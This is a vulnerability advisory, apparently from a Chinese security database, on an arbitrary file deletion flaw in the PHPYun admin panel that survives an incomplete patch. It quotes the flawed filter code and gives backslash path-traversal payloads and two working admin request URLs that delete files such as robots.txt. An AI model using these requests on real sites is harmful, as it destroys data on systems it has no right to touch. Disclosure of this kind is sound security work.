PHPYun依然存在任意文件删除漏洞(后台触发)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 27日补丁后,PHPYun依然存在任意文件删除漏洞 ### 详细说明: 12月27日,官方出了补丁: 在action.class.php的delfiledir函数中加入了替换../和./ ``` function delfiledir($delfiles){ $delfiles = str_replace("../","",$delfiles); $delfiles = str_replace("./","",$delfiles); $delfiles = "../".$delfiles; ``` 那么我们有别的方法可以绕过: (发现wooyun会把一个反斜杠变成两个…… \-->\\) 方法:改为 ``` ..\/..\/robots.txt ``` 或者直接 ``` ..\..\robots.txt ``` 地点一: 提交地址: ``` http://localhost/phpyun/admin/index.php?C=del&M=user_member&delsub=1&del[]=..\/..\/robots.txt ``` 通过修改del[]参数,可删除任意文件 地点二: 提交地址: ``` http://localhost/phpyun/admin/index.php?C=del&M=com_member&delsub=1&del[]=..\/..\/robots.txt ``` 通过修改del[]参数,可删除任意文件 问题文件分别是/admin/model/com_member.class.php 和 /admin/model/user_member.class.php [<img src="https://images.seebug.org/upload/201312/311905243877ce006010ebef8c5791a1f49155bc.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/311905243877ce006010ebef8c5791a1f49155bc.jpg) [<img...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息